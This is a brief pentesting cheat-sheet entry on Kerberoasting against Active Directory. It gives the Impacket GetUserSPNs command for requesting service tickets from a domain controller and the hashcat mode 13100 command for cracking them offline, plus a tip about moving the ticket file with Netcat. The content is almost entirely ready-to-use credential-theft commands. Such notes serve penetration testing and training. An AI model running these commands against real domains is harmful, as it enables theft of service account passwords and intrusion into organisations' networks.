Kerberoasting

A domain user is required to perform this attack.

NOTE:

Note that the service ticket file is binary. Keep this in mind when transferring it with a tool like Netcat, which may mangle it during transfer.

Get SPNs with Impacket

impacket-GetUserSPNs -dc-ip '<DC ip>' -request '<FQDN>/<USERNAME>'

Crack with hashcat

hashcat -m 13100 kerberoasting-hashes.txt '<WORDLIST>'

Last updated 2 months ago